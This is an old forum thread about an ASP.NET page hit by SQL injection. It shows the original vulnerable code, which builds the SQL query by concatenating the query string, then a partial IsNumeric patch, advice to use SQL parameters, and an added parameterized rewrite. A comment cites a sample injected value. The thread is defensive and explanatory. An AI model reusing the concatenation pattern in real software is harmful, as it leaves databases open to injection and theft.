
sql injection problem

I have a site that is made up of several aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnings I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx (line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.

Thanks,

Keith
Aug 12 '08 #1
By the way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

    Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
        If Not Page.IsPostBack Then
            If Request.QueryString("ClassmateID") <> "" Then
                ' The query string value is concatenated straight into the SQL text
                dsClassmates.SelectCommand = "SELECT * FROM " & _
                    "[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                    Request.QueryString("ClassmateID")
                dsClassmates.DataBind()
            End If
        End If
    End Sub
Here's what I changed it to (the line that tests for IsNumeric is new):

    Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
        If Not Page.IsPostBack Then
            If Request.QueryString("ClassmateID") <> "" Then
                ' New: only build the query when the value looks numeric and is short
                If IsNumeric(Request.QueryString("ClassmateID")) And _
                   (Len(Request.QueryString("ClassmateID").ToString) < 6) Then
                    dsClassmates.SelectCommand = "SELECT * FROM " & _
                        "[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                        Request.QueryString("ClassmateID")
                    dsClassmates.DataBind()
                End If
            End If
        End If
    End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:


So it seems to me if I test for numeric and limit the length of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too)

Thanks,

Keith

Aug 12 '08 #2
What you need to do is use SQLParameters to stop SQL injection. There
are lots of articles on this (search Google). Basically what you would
do is have your where statement something like WHERE ClassmateID =
@ClassmateID. Then create a SqlParameter which would get populated from
the QueryString.

LS
Aug 12 '08 #3
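As an added example (not code from the thread), here is the Page_Load from Keith's post rewritten the way LS suggests: the ID is checked with Integer.TryParse, which is stricter than the IsNumeric test in Keith's fix, and then handed to the data source as a typed parameter instead of being concatenated into the SelectCommand. It assumes dsClassmates is an asp:SqlDataSource, which is what the SelectCommand/DataBind calls in the original suggest.

```vbnet
' Added example, not the original poster's code. Assumes dsClassmates is an
' asp:SqlDataSource declared in the page markup.
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Page.IsPostBack Then Return

    Dim rawId As String = Request.QueryString("ClassmateID")
    Dim classmateId As Integer

    ' Integer.TryParse rejects values IsNumeric would accept ("1e3", "&H10",
    ' "1.5", "616;DECLARE ...") and never throws on bad input; a negative or
    ' zero ID is not a valid key for this view, so it is skipped as well.
    If String.IsNullOrEmpty(rawId) OrElse _
       Not Integer.TryParse(rawId, classmateId) OrElse _
       classmateId <= 0 Then
        Return
    End If

    ' The SQL text is now a constant. The value travels as a typed parameter,
    ' so nothing the client sends can change the statement that runs.
    dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] " & _
                                 "WHERE ClassmateID = @ClassmateID"
    dsClassmates.SelectParameters.Clear()
    dsClassmates.SelectParameters.Add("ClassmateID", TypeCode.Int32, classmateId.ToString())
    dsClassmates.DataBind()
End Sub
```

The same binding can be declared in the markup with an <asp:QueryStringParameter Name="ClassmateID" QueryStringField="ClassmateID" Type="Int32" /> inside <SelectParameters>, but then a non-numeric value raises a conversion error at bind time instead of being skipped quietly as above.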